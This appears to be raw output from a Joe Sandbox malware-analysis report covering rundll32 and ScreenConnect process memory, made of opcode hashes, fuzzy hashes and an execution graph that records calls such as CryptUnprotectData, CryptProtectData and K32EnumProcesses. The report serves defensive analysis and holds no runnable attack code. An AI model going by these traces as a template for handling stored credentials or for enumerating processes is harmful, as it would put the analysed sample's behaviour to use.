                                                                      • Opcode ID: 3446dc5fb5973dd66f72c52dad4a261da01859a32bed1d5bd6eb178718476a41
                                                                      • Instruction ID: 462bd038809b5f43fc985ad68d01b37eba4157822e642e770d029fa15f39b228
                                                                      • Opcode Fuzzy Hash: 3446dc5fb5973dd66f72c52dad4a261da01859a32bed1d5bd6eb178718476a41
                                                                      • Instruction Fuzzy Hash: 7711E530B042849BEB14AF7A896479F7EE29FC9324F1449ADC045A73E0CF755D05CB81
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1728033162.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_47c0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e22c8ccbb0422834bbc27627585a900b31501de7aef36e9b6c775a98ceaa2d7c
                                                                      • Instruction ID: 913481c1c6542948825c47bb98c7f252541b62668f4bf8af5e07633a3e05c3e1
                                                                      • Opcode Fuzzy Hash: e22c8ccbb0422834bbc27627585a900b31501de7aef36e9b6c775a98ceaa2d7c
                                                                      • Instruction Fuzzy Hash: 7601F230A00104C7EB18EA6885597EF7FF6DBC8714F14842DD406B7381CE756D018BE0
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1728033162.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_47c0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9b5b5b4ae7fe8106acfbeb517eb2885e5e28e820a4b7ef74342c62a840bb57a6
                                                                      • Instruction ID: 0840bd5da1d43fdc7eaf9c8cfbd6a0ff6f2c0cd9f47f65bd862be77b7a361bde
                                                                      • Opcode Fuzzy Hash: 9b5b5b4ae7fe8106acfbeb517eb2885e5e28e820a4b7ef74342c62a840bb57a6
                                                                      • Instruction Fuzzy Hash: 9901DF30B0020487EB18AA6AC9687AF7AE69FC8314F20446DD006A7390CE746D05CBD4
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1729160493.0000000002A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A9D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_2a9d000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 81fe56a4853d82c00f18936be595abf2a120bac46c9e63547bcab4c5d945a366
                                                                      • Instruction ID: b3d3db35099a9080f3eaf71763030e7e4f2c878868bf011200791c081a29a57c
                                                                      • Opcode Fuzzy Hash: 81fe56a4853d82c00f18936be595abf2a120bac46c9e63547bcab4c5d945a366
                                                                      • Instruction Fuzzy Hash: 5D01A2715087449AEF109B2ACDC4B67BFE8EF41324F18C52AED4A5F246CB799881C6B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1729160493.0000000002A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A9D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_2a9d000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80348c4e02dd55015bee5cc25c4c4455195a880a67a9a99d5735bb67f06d9b66
                                                                      • Instruction ID: 00d3ba2e51b821ed00f7699d18df55f29975b2c611c360898bfd7d874adb0b70
                                                                      • Opcode Fuzzy Hash: 80348c4e02dd55015bee5cc25c4c4455195a880a67a9a99d5735bb67f06d9b66
                                                                      • Instruction Fuzzy Hash: 8C015E7140E3C09FE7128B268D94B52BFB4EF52224F19C1DBD8888F2A3C2699844C772
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1728033162.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_47c0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bd4ed559ed5bdd5601c2d935cf24687a3160701b96870d578217d926029b3dc8
                                                                      • Instruction ID: bafcd740d6d3adcfe537e521226050a573e02cd090064161e5c433d7d87698a9
                                                                      • Opcode Fuzzy Hash: bd4ed559ed5bdd5601c2d935cf24687a3160701b96870d578217d926029b3dc8
                                                                      • Instruction Fuzzy Hash: BAF0F630B052056FCB0D9FBA55252167FEAEEC272830418BED54ACF253F924E906CBD2
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1728033162.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_47c0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8cd7349b1dd7b41f699e4c2b2bad1e86027b8335e119763678b7ab712d2e164f
                                                                      • Instruction ID: 55c3d1fbc06efe037329adc8c37979417473468bcf7d8b3adf34524555d1d920
                                                                      • Opcode Fuzzy Hash: 8cd7349b1dd7b41f699e4c2b2bad1e86027b8335e119763678b7ab712d2e164f
                                                                      • Instruction Fuzzy Hash: 9CF02B20B046941BFB3529B05A183961FD84F42708F0004EFC845C7B93DAC8E80323A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1728033162.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_47c0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 75b173929cd5e65c129598b9a7795fc6cdee76241cca81edba113e5e7d734924
                                                                      • Instruction ID: 1af4043bcf0295496080053c30da0ceae19716ef7d5a2ea1ef05a16cb4d0ab35
                                                                      • Opcode Fuzzy Hash: 75b173929cd5e65c129598b9a7795fc6cdee76241cca81edba113e5e7d734924
                                                                      • Instruction Fuzzy Hash: E0F0E5357483414FD7064729E8203697BA7DFC5319F1A04BED588CB2E7CE318842C680
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1728033162.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_47c0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 17904fff4c86e68bc2ced3431f88d7b74a3677ebe070f5921352a0e0c269b7b7
                                                                      • Instruction ID: bdae281d8ca7083611cbcb274a39c6e2d621163bdcdbe78e76be17ca465f47c6
                                                                      • Opcode Fuzzy Hash: 17904fff4c86e68bc2ced3431f88d7b74a3677ebe070f5921352a0e0c269b7b7
                                                                      • Instruction Fuzzy Hash: 9DE026327042045BCB049A6BE840917B7ABDBC9628B20447DE10CC3315CD329C428A90
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1728033162.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_47c0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1ed67e80e8a8cd9d8500d3f2de399f5ea61369683f98b7463d6115bef28ae2ec
                                                                      • Instruction ID: 4fda87156c1c99b8e061edf48830830ba407b01a157144d79b91718b791cdd7a
                                                                      • Opcode Fuzzy Hash: 1ed67e80e8a8cd9d8500d3f2de399f5ea61369683f98b7463d6115bef28ae2ec
                                                                      • Instruction Fuzzy Hash: 67E02B3310D1945FC7061F24A9550E53F74D71A21030540ABE84187363CD216D1AD7D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1728033162.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_47c0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 87a21f79d9c896499023f3c529956723c31d1e31601971a6bd6344f584e7ec88
                                                                      • Instruction ID: 577f84bff45484e9ac042407ad3f433d0fbf5b4f78f8b20782704ba560797dd2
                                                                      • Opcode Fuzzy Hash: 87a21f79d9c896499023f3c529956723c31d1e31601971a6bd6344f584e7ec88
                                                                      • Instruction Fuzzy Hash: 5FD0A7323150186B56046659D8898BABBD9E785360750443BFA0293324DD60BC4487D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1728033162.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_47c0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dca5210c0c21407397ba0fa8acf0e0b8adee85f5bc7bdcfb0a1d9aba4d3be496
                                                                      • Instruction ID: 9dca3109326eaa8c105c5d347be088933aab76dd05a89e3d40179b6c9bff0214
                                                                      • Opcode Fuzzy Hash: dca5210c0c21407397ba0fa8acf0e0b8adee85f5bc7bdcfb0a1d9aba4d3be496
                                                                      • Instruction Fuzzy Hash: 38D0127094120CEF8B40DFA8DA0155DBBB9DB85314B1045A99908D3201DA316E049B90
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1728033162.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_47c0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6fc97a95fdcc78dff9465fbf69ab8e3e43a2198eb91cf34ed73f6d89de7439bd
                                                                      • Instruction ID: 1dfa6323f4c1a643005687ae10337c1005ba318e5ac64cc763adb6e3103fafec
                                                                      • Opcode Fuzzy Hash: 6fc97a95fdcc78dff9465fbf69ab8e3e43a2198eb91cf34ed73f6d89de7439bd
                                                                      • Instruction Fuzzy Hash: 9AD05E7511D3C1AFC7025BD944540697F60AA63309B8A818AC0859C107D2259542D3B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.1728033162.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_47c0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /n^$/n^$/n^$/n^
                                                                      • API String ID: 0-1587614474
                                                                      • Opcode ID: 63a89034896b54595e136707b2e4ac69365419dd75a1cbaa2aa90be90a2e419f
                                                                      • Instruction ID: e966d38d23a4aa07de006d0a1ad925f09a4950705c77a6d3a0296feb8175e22b
                                                                      • Opcode Fuzzy Hash: 63a89034896b54595e136707b2e4ac69365419dd75a1cbaa2aa90be90a2e419f
                                                                      • Instruction Fuzzy Hash: 4C21E09558E7D65FD3175B2948B4A953FB5AE6328434F20DBC8C0CF1E3DA08881AC326

                                                                      Execution Graph

                                                                      Execution Coverage:11.7%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:8.7%
                                                                      Total number of Nodes:46
                                                                      Total number of Limit Nodes:7
                                                                      execution_graph 35592 44f15b8 35593 44f15fa 35592->35593 35594 44f1600 CryptProtectData 35592->35594 35593->35594 35595 44f1643 35594->35595 35540 6111e48 35541 6111e7c 35540->35541 35542 6111e6c 35540->35542 35548 6111fc6 35541->35548 35555 6111fc8 35541->35555 35543 6111e75 35542->35543 35546 6111fc6 4 API calls 35542->35546 35547 6111fc8 4 API calls 35542->35547 35546->35542 35547->35542 35551 6111fcb 35548->35551 35549 6111fed 35550 6111ff6 35549->35550 35577 6110fe8 35549->35577 35550->35542 35551->35549 35562 6112138 35551->35562 35570 6112148 35551->35570 35556 6111fed 35555->35556 35558 6111ffd 35555->35558 35557 6111ff6 35556->35557 35559 6110fe8 ProcessIdToSessionId 35556->35559 35557->35542 35560 6112138 2 API calls 35558->35560 35561 6112148 2 API calls 35558->35561 35559->35556 35560->35556 35561->35556 35563 6112110 35562->35563 35567 611213b 35562->35567 35563->35549 35564 6112168 35564->35549 35565 611215f 35565->35564 35566 61122da K32EnumProcesses 35565->35566 35568 6112312 35566->35568 35567->35565 35580 6110ff4 35567->35580 35568->35549 35572 611215f 35570->35572 35575 6112172 35570->35575 35571 6112168 35571->35549 35572->35571 35573 61122da K32EnumProcesses 35572->35573 35576 6112312 35573->35576 35574 6110ff4 K32EnumProcesses 35574->35575 35575->35572 35575->35574 35576->35549 35578 6112380 ProcessIdToSessionId 35577->35578 35579 61123f3 35578->35579 35579->35549 35581 6112288 K32EnumProcesses 35580->35581 35583 6112312 35581->35583 35583->35567 35584 5e7b6c8 35585 5e7b6db 35584->35585 35588 5e78e08 35585->35588 35589 5e7b718 CreateFileA 35588->35589 35591 5e7b84d 35589->35591
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2989923207.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: 3842a3b22e1286f887f2cddbef2327dd607c110d59c8e60b4fcc7c2f6c115aee
                                                                      • Instruction ID: 5b32a541c234323ef2b3070fc073af8feba4c97c9b49e551ee17958fd58a1eec
                                                                      • Opcode Fuzzy Hash: 3842a3b22e1286f887f2cddbef2327dd607c110d59c8e60b4fcc7c2f6c115aee
                                                                      • Instruction Fuzzy Hash: 7D21DEB280425AAFCB00DF9CC884ADEBFF0EF48324F14805AE594A7212D3359546CFA5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2989923207.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: 8ae1cede4cdc6a03df243e94569c96837770d8d86a5d7408aed56a35372d3101
                                                                      • Instruction ID: 8de009c975f308cbaeaa255c1353daa3927bfdd15b1f6b3fe30249dd08cb63e4
                                                                      • Opcode Fuzzy Hash: 8ae1cede4cdc6a03df243e94569c96837770d8d86a5d7408aed56a35372d3101
                                                                      • Instruction Fuzzy Hash: 65219DB280424ADFCB10CF99C885BDEBFF4EF48324F148059E594A7211D335A946CFA5
                                                                      APIs
                                                                      • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 044F162E
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2983877506.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_44f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataProtect
                                                                      • String ID:
                                                                      • API String ID: 3091777813-0
                                                                      • Opcode ID: c9b2005b4e99206b88ad76c3393553443bedfc7465ae0d84e35b537353bae714
                                                                      • Instruction ID: 26bf56b657fe64fd4ab40408909dedf0f7e3d604b5f7bc704e5b6fb70d0122e2
                                                                      • Opcode Fuzzy Hash: c9b2005b4e99206b88ad76c3393553443bedfc7465ae0d84e35b537353bae714
                                                                      • Instruction Fuzzy Hash: 832125B6800249DFDF10CF99C844ADFBBF1FB88310F14841AE919A7250C339A956CFA1
                                                                      APIs
                                                                      • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 044F162E
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2983877506.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_44f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataProtect
                                                                      • String ID:
                                                                      • API String ID: 3091777813-0
                                                                      • Opcode ID: 818b5aa486a5b84ecd61791443f4147acc93f656fd4b183e01bc8122e47bc7b0
                                                                      • Instruction ID: 5bce6f01484a56236971fe9655bce29827ac78eae6d64715c7860c7a1c347949
                                                                      • Opcode Fuzzy Hash: 818b5aa486a5b84ecd61791443f4147acc93f656fd4b183e01bc8122e47bc7b0
                                                                      • Instruction Fuzzy Hash: 432104B6800249DFDF10CF9AC844ADFBBF5FB88310F14842AE919A7251C339A955CFA5
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05E7F5B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2989923207.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: 3b24cf5aeca4ef4daba071223e70a9699be44e5fb45d6f7a79f5044125019cc6
                                                                      • Instruction ID: 8eaf9aed7952f6ed57297482e3dda3b5b70016674c83308df0a9b9473411f3f4
                                                                      • Opcode Fuzzy Hash: 3b24cf5aeca4ef4daba071223e70a9699be44e5fb45d6f7a79f5044125019cc6
                                                                      • Instruction Fuzzy Hash: AE2179B2804249DFCB10CF99C884BDEBFF5EF48310F248419E9A4A7251D335A551CFA5
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05E7F5B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2989923207.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: 07a167a2a8fc25ca7bfe586a6f10c8efdcd61ae89d938fe54e492659689b1717
                                                                      • Instruction ID: 4301834940af98625e52a86d1f9dc30411251dc3d556c30eaacdee6f483fbfe5
                                                                      • Opcode Fuzzy Hash: 07a167a2a8fc25ca7bfe586a6f10c8efdcd61ae89d938fe54e492659689b1717
                                                                      • Instruction Fuzzy Hash: D7216AB280024DDFDF10CF99C844BDEBBF4EB48320F108419E964A7210D335A950DFA5
                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05E7F5B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2989923207.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: 93549bec08a23d49aebadaadfb1dca80744040797821fa3f1940bd3d296c439d
                                                                      • Instruction ID: f894d711e189b88cdd769b8a538a66fbfa9c76ed782e7ed425217383e1ac1ac3
                                                                      • Opcode Fuzzy Hash: 93549bec08a23d49aebadaadfb1dca80744040797821fa3f1940bd3d296c439d
                                                                      • Instruction Fuzzy Hash: 042159B2800249DFDF10CF99C884BDEBBF4EF48320F108459E564A7250C735A955DFA5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 180 5e78e05-5e7b774 182 5e7b776-5e7b79b 180->182 183 5e7b7c8-5e7b84b CreateFileA 180->183 182->183 186 5e7b79d-5e7b79f 182->186 192 5e7b854-5e7b892 183->192 193 5e7b84d-5e7b853 183->193 187 5e7b7c2-5e7b7c5 186->187 188 5e7b7a1-5e7b7ab 186->188 187->183 190 5e7b7af-5e7b7be 188->190 191 5e7b7ad 188->191 190->190 194 5e7b7c0 190->194 191->190 198 5e7b894-5e7b898 192->198 199 5e7b8a2 192->199 193->192 194->187 198->199 200 5e7b89a 198->200 201 5e7b8a3 199->201 200->199 201->201
                                                                      APIs
                                                                      • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05E7B835
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2989923207.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: 4L^q
                                                                      • API String ID: 823142352-616035646
                                                                      • Opcode ID: a77a5fd5f28809ff9d6f45d6eb253e9497dc733972a113fcbbfad7a71d55742d
                                                                      • Instruction ID: a48d3b3340ca73f20f193cf567319b501a1fd43c8da0f0f9ab7b958134ca3299
                                                                      • Opcode Fuzzy Hash: a77a5fd5f28809ff9d6f45d6eb253e9497dc733972a113fcbbfad7a71d55742d
                                                                      • Instruction Fuzzy Hash: D65167B1D0025D9FEB10CFA9C884B9EBBF6FF48304F248169E848AB251E7759845CF91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 202 5e78e08-5e7b774 204 5e7b776-5e7b79b 202->204 205 5e7b7c8-5e7b84b CreateFileA 202->205 204->205 208 5e7b79d-5e7b79f 204->208 214 5e7b854-5e7b892 205->214 215 5e7b84d-5e7b853 205->215 209 5e7b7c2-5e7b7c5 208->209 210 5e7b7a1-5e7b7ab 208->210 209->205 212 5e7b7af-5e7b7be 210->212 213 5e7b7ad 210->213 212->212 216 5e7b7c0 212->216 213->212 220 5e7b894-5e7b898 214->220 221 5e7b8a2 214->221 215->214 216->209 220->221 222 5e7b89a 220->222 223 5e7b8a3 221->223 222->221 223->223
                                                                      APIs
                                                                      • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05E7B835
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2989923207.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: 4L^q
                                                                      • API String ID: 823142352-616035646
                                                                      • Opcode ID: ba8439d61839168abf65b047a920e028b476c0cfa43954f61243295a696bb1b1
                                                                      • Instruction ID: 9c49653fb11e7b4f140bc914a067ea910e9420fb9c7f50e17155eda030b34849
                                                                      • Opcode Fuzzy Hash: ba8439d61839168abf65b047a920e028b476c0cfa43954f61243295a696bb1b1
                                                                      • Instruction Fuzzy Hash: 6A5133B1D0025C9FEB10CFA9C984B9EBBF6FB48304F248169E848AB251E7759845CB91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 224 5e7b712-5e7b774 226 5e7b776-5e7b79b 224->226 227 5e7b7c8-5e7b84b CreateFileA 224->227 226->227 230 5e7b79d-5e7b79f 226->230 236 5e7b854-5e7b892 227->236 237 5e7b84d-5e7b853 227->237 231 5e7b7c2-5e7b7c5 230->231 232 5e7b7a1-5e7b7ab 230->232 231->227 234 5e7b7af-5e7b7be 232->234 235 5e7b7ad 232->235 234->234 238 5e7b7c0 234->238 235->234 242 5e7b894-5e7b898 236->242 243 5e7b8a2 236->243 237->236 238->231 242->243 244 5e7b89a 242->244 245 5e7b8a3 243->245 244->243 245->245
                                                                      APIs
                                                                      • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05E7B835
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2989923207.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_5e70000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: 4L^q
                                                                      • API String ID: 823142352-616035646
                                                                      • Opcode ID: ee8aea4220ee68f5701b108c48903fba290843ce1b1a145a179c45348f66039f
                                                                      • Instruction ID: b4599076db490b5553d9f611168d269276ed799e7e0d9d412f1dfc46239070c5
                                                                      • Opcode Fuzzy Hash: ee8aea4220ee68f5701b108c48903fba290843ce1b1a145a179c45348f66039f
                                                                      • Instruction Fuzzy Hash: FF4168B1D0024C9FEB10CFA9C984B9DBBF6FF48304F248169E858AB291D7759845CF81

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 723 6112148-611215d 724 6112172-6112179 723->724 725 611215f-6112162 723->725 728 611217e-61121c2 call 6110ff4 724->728 726 6112168-6112171 725->726 727 611222c-6112240 725->727 729 6112242 727->729 730 6112206-611220f 727->730 745 61121c7-61121cc 728->745 734 611224e-6112257 729->734 732 6112211-611222b 730->732 733 611226c-61122ce 730->733 739 61122d0-61122d8 733->739 740 61122da-6112310 K32EnumProcesses 733->740 739->740 742 6112312-6112318 740->742 743 6112319-6112341 740->743 742->743 748 61121d2-61121d5 745->748 749 6112258-6112265 745->749 750 6112244-6112249 748->750 751 61121d7-6112204 748->751 749->733 750->728 751->730 751->734
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2990518114.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_6110000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 84fd2d28f8b473e2bc5020b3bf4414d3ea74ff7ffaaad306de58cf6ee4f48ccc
                                                                      • Instruction ID: 300b4d3b9daf5e5e9553781e3fa141d926bc1153d15d5856945263097176ec03
                                                                      • Opcode Fuzzy Hash: 84fd2d28f8b473e2bc5020b3bf4414d3ea74ff7ffaaad306de58cf6ee4f48ccc
                                                                      • Instruction Fuzzy Hash: 86519F71E006098FCB64DFA9D8846AEBBF1FF88310F10892DD569E7650D734E945CB91
                                                                      APIs
                                                                      • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 061122FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2990518114.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_6110000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: EnumProcesses
                                                                      • String ID:
                                                                      • API String ID: 84517404-0
                                                                      • Opcode ID: 8284556caa60e4f62d84b0cd1d269c2cdfb02b76675415b7196b9b0e72e979fa
                                                                      • Instruction ID: b0fa5b03efc90f059ef50f7df20e847e6cbc44877bd6acfb4212762d41a6ea82
                                                                      • Opcode Fuzzy Hash: 8284556caa60e4f62d84b0cd1d269c2cdfb02b76675415b7196b9b0e72e979fa
                                                                      • Instruction Fuzzy Hash: 252125B5D002099FDB10CFAAC884ADEFBF4EB48310F10842EE518A7241C378AA41CBA5
                                                                      APIs
                                                                      • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 061123DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2990518114.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_6110000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessSession
                                                                      • String ID:
                                                                      • API String ID: 3779259828-0
                                                                      • Opcode ID: bdd32c572989ed2db31151ee5bdd4700ccea8148aaba04983b968c7e174eb77a
                                                                      • Instruction ID: 2117aacfc3b9e19e1cf3114fadd2a6520ef27225a51698e0576ea5cd82fdae08
                                                                      • Opcode Fuzzy Hash: bdd32c572989ed2db31151ee5bdd4700ccea8148aaba04983b968c7e174eb77a
                                                                      • Instruction Fuzzy Hash: B31144B1C002099FDB10DF9AC844BDEFBF4EB48320F108469D459B7200C778AA45CFA5
                                                                      APIs
                                                                      • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 061123DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2990518114.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_6110000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessSession
                                                                      • String ID:
                                                                      • API String ID: 3779259828-0
                                                                      • Opcode ID: 28c7f580fd9817a9de8a93c9759c7652a0235ccf72acc8cc71148564e408b1d3
